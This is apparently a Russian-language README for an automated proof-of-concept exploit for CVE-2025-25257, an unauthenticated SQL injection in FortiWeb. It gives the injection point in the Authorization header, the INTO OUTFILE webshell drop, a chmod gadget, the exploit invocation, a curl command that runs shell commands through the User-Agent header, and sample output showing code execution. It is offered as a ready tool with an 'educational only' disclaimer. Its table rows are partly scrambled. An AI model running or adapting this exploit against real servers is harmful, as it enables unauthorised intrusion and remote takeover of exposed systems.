
PoC для CVE-2025-25257, критическая SQL-инъекция без аутентификации в FortiWeb. Эксплуатирует SQLi через заголовок Authorization для записи веб-шелла и получения RCE. Вход не требуется. Полностью автоматизировано.
Критическая SQL-инъекция → Исполнение веб-шелла
Обнаружена и реализована 0xgh057r3c0n
CVE-2025-25257 затрагивает системы FortiWeb, которые предоставляют эндпоинт /api/fabric/device/status, который не выполняет должную санитизацию ввода заголовка Authorization.
Злоумышленник может выполнить неавторизованную SQL-инъекцию, чтобы записать веб-шелл на сервер и удалённо выполнять команды.
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
INTO OUTFILE для сброса шеллаpython3 CVE-2025-25257.py -t https://target-host.com
Затем:
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
requestsУстановка:
pip install requests
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
| Метрика | Значение |
|---|---|
| Базовая оценка | 9.8 (КРИТИЧЕСКИ) |
| Вектор атаки | Сеть |
| Необходимые привилегии | Нет |
| Взаимодействие пользователя |
0xgh057r3c0n 🔗 github.com/0xgh057r3c0n
Этот proof-of-concept предназначен только для образовательных и авторизованных тестов. Используйте на свой страх и риск. Автор не несёт ответственности за неправомерное использование.
| Нет |
| Влияние | Высокое (C/I/A) |